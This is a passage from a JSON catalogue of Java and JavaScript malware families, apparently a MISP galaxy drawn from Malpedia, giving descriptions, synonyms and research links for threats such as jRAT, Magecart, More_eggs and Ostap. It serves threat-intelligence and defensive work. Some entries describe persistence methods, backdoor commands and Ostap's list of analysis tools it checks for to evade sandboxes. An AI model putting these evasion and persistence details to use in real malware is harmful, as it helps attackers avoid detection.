"https://malpedia.caad.fkie.fraunhofer.de/details/jar.javalocker", "https://dissectingmalwa.re/why-would-you-even-bother-javalocker.html", "https://id-ransomware.blogspot.com/2020/03/javalocker-ransomware.html" ], "synonyms": [ "JavaEncrypt Ransomware" ], "type": [] }, "uuid": "4bdddf41-8d5e-468d-905d-8c6667a5d47f", "value": "JavaLocker" }, { "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat", "https://www.eff.org/files/2018/01/29/operation-manul.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/", "https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/", "https://research.checkpoint.com/malware-against-the-c-monoculture/", "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered" ], "synonyms": [ "Jacksbot" ], "type": [] }, "uuid": "f2a9f583-b4dd-4669-8808-49c8bbacc376", "value": "jRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jspy", "https://how-to-hack.net/hacking-guides/review-of-jspy-rat-jspy-net/" ], "synonyms": [], "type": [] }, "uuid": "ff24997d-1f17-4f00-b9b8-b3392146540f", "value": "jSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.octopus_scanner", "http://blog.nsfocus.net/github-ocs-0605/", "https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain" ], "synonyms": [], "type": [] }, "uuid": "8ae996fe-50bb-479b-925c-e6b1e51a9b40", "value": "Octopus Scanner" }, { "description": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qarallax_rat", "http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/" ], "synonyms": [], "type": [] }, "uuid": "e7852eb9-9de9-43d3-9f7e-3821f3b2bf41", "value": "Qarallax RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qealler", "https://www.securityinbits.com/malware-analysis/unpacking/unpacking-pyrogenic-qealler-using-java-agent-part-0x2/", "https://www.securityinbits.com/malware-analysis/pyrogenic-infostealer-static-analysis-part-0x1/", "https://www.cyberark.com/threat-research-blog/qealler-the-silent-java-credential-thief/", "https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer", "https://www.securityinbits.com/malware-analysis/similarity-between-qealler-pyrogenic-variants-part-0x3/", "https://github.com/jeFF0Falltrades/Malware-Writeups/blob/master/Qealler/Qealler-Unloaded.pdf", "https://www.herbiez.com/?p=1352" ], "synonyms": [ "Pyrogenic Infostealer" ], "type": [] }, "uuid": "d16a3a1f-e244-4715-a67f-61ba30901efb", "value": "Qealler" }, { "description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rats-and-spam-the-nodejs-qrat/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/updated-qnode-rat-downloader-distributed-as-trump-video-scandal/", "https://www.digitrustgroup.com/java-rat-qrat/" ], "synonyms": [ "Quaverse RAT" ], "type": [] }, "uuid": "ef385825-bfa1-4e8c-b368-522db78cf1bd", "value": "QRat" }, { "description": "Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty", "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/" ], "synonyms": [], "type": [] }, "uuid": "da032a95-b02a-4af2-b563-69f686653af4", "value": "Ratty" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.strrat", "https://www.gdatasoftware.com/blog/strrat-crimson" ], "synonyms": [], "type": [] }, "uuid": "6d1335d5-8351-4725-ad8a-07cabca4119e", "value": "STRRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.supremebot", "https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/" ], "synonyms": [ "BlazeBot" ], "type": [] }, "uuid": "651e37e0-1bf8-4024-ac1e-e7bda42470b0", "value": "SupremeBot" }, { "description": "AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak", "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html", "http://www.kahusecurity.com/posts/reflow_javascript_backdoor.html", "https://www.secureworks.com/research/threat-profiles/bronze-mohawk" ], "synonyms": [ "Orz" ], "type": [] }, "uuid": "fd419da6-5c0d-461e-96ee-64397efac63b", "value": "AIRBREAK" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.secureworks.com/research/threat-profiles/gold-niagara", "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor" ], "synonyms": [], "type": [] }, "uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65", "value": "Bateleur" }, { "description": "• BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n• Creating a Run key in the Registry\r\n• Creating a RunOnce key in the Registry\r\n• Creating a persistent named scheduled task\r\n• BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.bellhop", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" ], "synonyms": [], "type": [] }, "uuid": "7ebeb691-b979-4a88-94e1-dade780c6a7f", "value": "BELLHOP" }, { "description": "According to the GitHub repo, CACTUSTORCH is a JavaScript and VBScript shellcode launcher. It will spawn a 32 bit version of the binary specified and inject shellcode into it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cactustorch", "https://www.macnica.net/file/mpression_automobile.pdf", "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf", "https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/", "https://www.codercto.com/a/46729.html", "https://github.com/mdsecactivebreach/CACTUSTORCH" ], "synonyms": [], "type": [] }, "uuid": "efbb5a7c-8c01-4aca-ac21-8dd614b256f7", "value": "CACTUSTORCH" }, { "description": "WebAssembly-based crpyto miner.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cryptonight", "https://gist.github.com/JohnLaTwC/112483eb9aed27dd2184966711c722ec", "https://twitter.com/JohnLaTwC/status/983011262731714565" ], "synonyms": [], "type": [] }, "uuid": "faa19699-a884-4cd3-a307-36492c8ee77a", "value": "CryptoNight" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cukiegrab_crx", "http://blog.trendmicro.com/trendlabs-security-intelligence/malicous-chrome-extensions-stealing-roblox-game-currency-sending-cookies-via-discord/" ], "synonyms": [ "Roblox Trade Assist" ], "type": [] }, "uuid": "d47ca107-3e03-4c25-88f9-8156426b7f60", "value": "CukieGrab" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.dnsrat", "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" ], "synonyms": [ "DNSbot" ], "type": [] }, "uuid": "a4b40d48-e40b-47f2-8e30-72342231503e", "value": "DNSRat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.enrume", "https://blog.emsisoft.com/de/21077/meet-ransom32-the-first-javascript-ransomware/" ], "synonyms": [ "Ransom32" ], "type": [] }, "uuid": "d6e5f6b7-cafb-476d-958c-72debdabe013", "value": "Enrume" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.evilnum", "https://github.com/eset/malware-ioc/tree/master/evilnum", "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw", "https://securelist.com/deathstalker-mercenary-triumvirate/98177/", "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html", "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf", "http://www.pwncode.io/2018/05/javascript-based-bot-using-github-c.html", "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/", "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/" ], "synonyms": [], "type": [] }, "uuid": "b7deec7e-24f7-4f78-9d58-9b3c1e182ab3", "value": "EVILNUM (Javascript)" }, { "description": "grelos is a skimmer used for magecart-style attacks.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.grelos", "https://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745", "https://www.riskiq.com/blog/labs/magecart-medialand/", "https://community.riskiq.com/article/8c4b4a7a" ], "synonyms": [], "type": [] }, "uuid": "79580c0b-c390-4421-976a-629a5c11af95", "value": "grelos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon", "https://twitter.com/ItsReallyNick/status/1059898708286939136", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.secureworks.com/research/threat-profiles/gold-niagara", "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout" ], "synonyms": [], "type": [] }, "uuid": "85c25380-69d7-4d7e-b279-6b6791fd40bd", "value": "Griffon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.inter", "https://www.fortinet.com/blog/threat-research/inter-skimmer-for-all.html" ], "synonyms": [], "type": [] }, "uuid": "36b0f1a0-29a4-4ec5-bca2-18a241881d49", "value": "inter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.jsprat", "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators" ], "synonyms": [], "type": [] }, "uuid": "71903afc-7129-4821-90e5-c490e4902de3", "value": "jspRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack", "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", "https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/" ], "synonyms": [], "type": [] }, "uuid": "2269d37b-87e9-460d-b878-b74a2f4c3537", "value": "KopiLuwak" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.lnkr", "https://github.com/Zenexer/lnkr", "https://github.com/Zenexer/lnkr/blob/master/recon/extensions/fanagokoaogopceablgmpndejhedkjjb/README.md", "https://www.riskiq.com/blog/labs/lnkr-browser-extension/", "https://krebsonsecurity.com/2020/03/the-case-for-limiting-your-browser-extensions/" ], "synonyms": [], "type": [] }, "uuid": "1a85acf3-4bda-49b4-9e50-1231f0b7340a", "value": "LNKR" }, { "description": "Magecart is a malware framework intended to steal credit card information from compromised eCommerce websites. Used in criminal activities, it's a sophisticated implant built on top of relays, command and controls and anonymizers used to steal eCommerce customers' credit card information. The first stage is typically implemented in Javascript included into a compromised checkout page. It copies data from \"input fields\" and send them to a relay which collects credit cards coming from a subset of compromised eCommerces and forwards them to Command and Control servers.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart", "https://sansec.io/research/magento-2-persistent-parasite", "https://geminiadvisory.io/wp-content/uploads/2020/07/Appendix-C-1.pdf", "https://sansec.io/research/north-korea-magecart", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", "https://www.riskiq.com/blog/labs/magecart-medialand/", "https://maxkersten.nl/2020/02/17/following-the-tracks-of-magecart-12/", "https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/", "https://www.riskiq.com/blog/labs/magecart-nutribullet/", "https://community.riskiq.com/article/fda1f967", "https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/", "https://blog.trendmicro.com/trendlabs-security-intelligence/us-local-government-services-targeted-by-new-magecart-credit-card-skimming-attack/", "https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/", "https://sansec.io/labs/2020/01/25/magecart-hackers-arrested/", "https://www.reflectiz.com/ico-fines-ticketmaster-uk-1-25-million-for-security-failures-a-lesson-to-be-learned/", "https://www.goggleheadedhacker.com/blog/post/14", "https://www.riskiq.com/blog/labs/magecart-group-12-olympics/", "https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/", "https://community.riskiq.com/article/5bea32aa", "https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/", "https://www.crowdstrike.com/blog/threat-actor-magecart-coming-to-an-ecommerce-store-near-you/", "https://blog.malwarebytes.com/cybercrime/2019/04/github-hosted-magecart-skimmer-used-against-hundreds-of-e-commerce-sites/", "https://marcoramilli.com/2020/02/19/uncovering-new-magecart-implant-attacking-ecommerce/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/injecting-magecart-into-magento-global-config/", "https://www.perimeterx.com/blog/analyzing_magecart_malware_from_zero_to_hero/", "https://www.zdnet.com/article/web-skimmers-found-on-the-websites-of-intersport-claires-and-icing/", "https://community.riskiq.com/article/30f22a00", "https://securelist.com/apt-trends-report-q2-2019/91897/", "https://community.riskiq.com/article/14924d61", "https://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html", "https://maxkersten.nl/2020/01/20/ticket-resellers-infected-with-a-credit-card-skimmer/", "https://medium.com/reflectiz/csp-the-right-solution-for-the-web-skimming-pandemic-acb7a4414218", "https://sansec.io/research/magecart-corona-lockdown", "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/", "https://blog.trendmicro.com/trendlabs-security-intelligence/magecart-skimming-attack-targets-mobile-users-of-hotel-chain-booking-websites/", "https://blog.malwarebytes.com/threat-analysis/2020/06/web-skimmer-hides-within-exif-metadata-exfiltrates-credit-cards-via-image-files/", "https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html", "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", "https://www.riskiq.com/blog/labs/misconfigured-s3-buckets/", "https://maxkersten.nl/2020/02/24/closing-in-on-magecart-12/", "https://blog.sucuri.net/2020/07/skimmers-in-images-github-repos.html", "https://www.reflectiz.com/the-gocgle-web-skimming-campaign/" ], "synonyms": [], "type": [] }, "uuid": "f53e404b-0dcd-4116-91dd-cad94fc41936", "value": "magecart" }, { "description": "More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are:\r\n- d&exec = download and execute PE file\r\n- gtfo = delete files/startup entries and terminate\r\n- more_eggs = download additional/new scripts\r\n- more_onion = run new script and terminate current script\r\n- more_power = run command shell commands", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs", "https://attack.mitre.org/software/S0284/", "https://github.com/eset/malware-ioc/tree/master/evilnum", "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw", "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/", "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/", "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/", "https://www.secureworks.com/research/threat-profiles/gold-kingswood", "http://www.secureworks.com/research/threat-profiles/gold-kingswood", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/", "https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers", "https://twitter.com/Arkbird_SOLG/status/1301536930069278727", "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish", "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/", "https://blog.morphisec.com/cobalt-gang-2.0" ], "synonyms": [ "SKID", "SpicyOmelette" ], "type": [] }, "uuid": "1c3009ff-b9a5-4ac1-859c-9b3b4a66a63f", "value": "More_eggs" }, { "description": "NanHaiShu is a remote access tool and JScript backdoor used by Leviathan. NanHaiShu has been used to target government and private-sector organizations that have relations to the South China Sea dispute.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.nanhaishu", "https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-social-engineering", "https://attack.mitre.org/software/S0228/", "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", "https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf" ], "synonyms": [], "type": [] }, "uuid": "3e46af39-52e8-442f-aff1-38eeb90336fc", "value": "NanHaiShu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.node_rat", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/", "https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html" ], "synonyms": [], "type": [] }, "uuid": "e3b0ed5c-4e6a-4f50-bef2-1f7112aa31ed", "value": "NodeRAT" }, { "description": "Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI to check for a blacklist of running processes:\r\n\r\nAgentSimulator.exe\r\nanti-virus.EXE\r\nBehaviorDumper\r\nBennyDB.exe\r\nctfmon.exe\r\nfakepos_bin\r\nFrzState2k\r\ngemu-ga.exe (Possible misspelling of Qemu hypervisor’s guest agent, qemu-ga.exe)\r\nImmunityDebugger.exe\r\nKMS Server Service.exe\r\nProcessHacker\r\nprocexp\r\nProxifier.exe\r\npython\r\ntcpdump\r\nVBoxService\r\nVBoxTray.exe\r\nVmRemoteGuest\r\nvmtoolsd\r\nVMware2B.exe\r\nVzService.exe\r\nwinace\r\nWireshark\r\n\r\nIf a blacklisted process is found, the malware terminates.\r\n\r\nOstap has been observed delivering other malware families, including Nymaim, Backswap and TrickBot.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.ostap", "https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/", "https://www.intrinsec.com/deobfuscating-hunting-ostap/", "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/", "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", "https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/", "https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/deobfuscate_ostap.py" ], "synonyms": [], "type": [] }, "uuid": "a3b93781-c51c-4ccb-a856-804331470a9d", "value": "ostap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.powmet", "http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/" ], "synonyms": [], "type": [] }, "uuid": "9521ceb0-039d-412c-a38b-7bd9ddfc772e", "value": "Powmet" }, { "description": "According to Trend Micro, this is a Node.js based malware, that can download/upload/execute files, steal credentials from Chrome/Firefox browsers, and perform file management, among other things. It targets Windows and has components for both 32 and 64bit.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.qnodeservice", "https://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/", "https://www.telsy.com/wp-content/uploads/MAR_93433_WHITE.pdf" ], "synonyms": [], "type": [] }, "uuid": "52d9260f-f090-4e79-b0b3-0c89f5db6bc6", "value": "QNodeService" }, { "description": "QUICKCAFE is an encrypted JavaScript downloader for QUICKRIDE.POWER that exploits the ActiveX M2Soft vulnerabilities. QUICKCAFE is obfuscated using JavaScript Obfuscator.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.quickcafe", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" ], "synonyms": [], "type": [] }, "uuid": "475766d2-1e99-4d81-89e4-0d0df4a562d0", "value": "QUICKCAFE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox", "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/attacker-tracking-users-seeking-pakistani-passport/", "https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global", "https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", "http://resources.infosecinstitute.com/scanbox-framework/", "https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/" ], "synonyms": [], "type": [] }, "uuid": "0a13a546-91a2-4de0-9bbb-71c9233ce6fa", "value": "scanbox" }, { "description": "SQLRat campaigns typically involve a lure document that includes an image overlayed by a VB Form trigger. Once a user has double-clicked the embedded image, the form executes a VB setup script. The script writes files to the path %appdata%\\Roaming\\Microsoft\\Templates\\, then creates two task entries triggered to run daily. The scripts are responsible for deobfuscating and executing the main JavaScript file mspromo.dot. The file uses a character insertion obfuscation technique, making it appear to contain Chinese characters. After deobfuscating the file, the main JavaScript is easily recognizable. It contains a number of functions designed to drop files and execute scripts on a host system. The SQLRat script is designed to make a direct SQL connection to a Microsoft database controlled by the attackers and execute the contents of various tables.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.sqlrat", "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" ], "synonyms": [], "type": [] }, "uuid": "d51cb8f8-cca3-46ce-a05d-052df44aef40", "value": "SQLRat" }, { "description": "According to the author, this is a JavaScript based Empire launcher that runs with its own embedded powershell host to not be dependent on local powershell availability.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.starfighter", "https://github.com/Cn33liz/StarFighters" ], "synonyms": [], "type": [] }, "uuid": "f6c80748-1cce-4f6b-92e9-f8a04ff3464a", "value": "Starfighter (Javascript)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext", "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/" ], "synonyms": [], "type": [] }, "uuid": "c7ab9e5a-0ec9-481e-95ec-ad08f06cf985", "value": "HTML5 Encoding" }, { "description": "Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_maintools", "https://twitter.com/JohnLaTwC/status/915590893155098629" ], "synonyms": [], "type": [] }, "uuid": "218f8ca8-1124-4e44-8fbd-4b05b46bde4b", "value": "Maintools.js" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_001", "https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f", "https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef" ], "synonyms": [], "type": [] }, "uuid": "f2b0ffdc-7d4e-4786-8935-e7036faa174d", "value": "Unidentified JS 001 (APT32 Profiler)" }, { "description": "According to Max Kersten, Emotet is dropped by a procedure spanned over multiple stages. The first stage is an office file that contains a macro. This macro then loads the second stage, which is either a PowerShell script or a piece of JavaScript, which is this family entry.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_003", "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-javascript-downloader/" ], "synonyms": [], "type": [] }, "uuid": "7bf28be0-3153-474d-8df7-e12fec511d7e", "value": "Unidentified JS 003 (Emotet Downloader)" }, { "description": "A simple loader written in JavaScript found by Marco Ramilli.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_004", "https://marcoramilli.com/2020/11/27/threat-actor-unkown/" ], "synonyms": [], "type": [] }, "uuid": "a15e7c49-4eb6-46f0-8f79-0b765d7d4e46", "value": "Unidentified JS 004" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_js_002" ], "synonyms": [], "type": [] }, "uuid": "7144063f-966b-4277-b316-00eb970ccd52", "value": "Unidentified JS 002" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.valak", "https://medium.com/@prsecurity_/casual-analysis-of-valak-c2-3497fdb79bf7", "https://twitter.com/malware_traffic/status/1207824548021886977", "https://security-soup.net/analysis-of-valak-maldoc/", "https://www.cybereason.com/blog/valak-more-than-meets-the-eye", "https://labs.sentinelone.com/valak-malware-and-the-connection-to-gozi-loader-confcrew/", "https://unit42.paloaltonetworks.com/valak-evolution/", "https://blog.talosintelligence.com/2020/07/valak-emerges.html" ], "synonyms": [ "Valek" ], "type": [] }, "uuid": "b37b4d91-0ac7-48f5-8fd1-5237b9615cf7", "value": "Valak" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.witchcoven", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf" ], "synonyms": [], "type": [] }, "uuid": "dcc0fad2-29a9-4b69-9d75-d288ca458bc7", "value": "witchcoven" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.applejeus", "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a", "https://objective-see.com/blog/blog_0x54.html", "https://securelist.com/apt-trends-report-q2-2020/97937/", 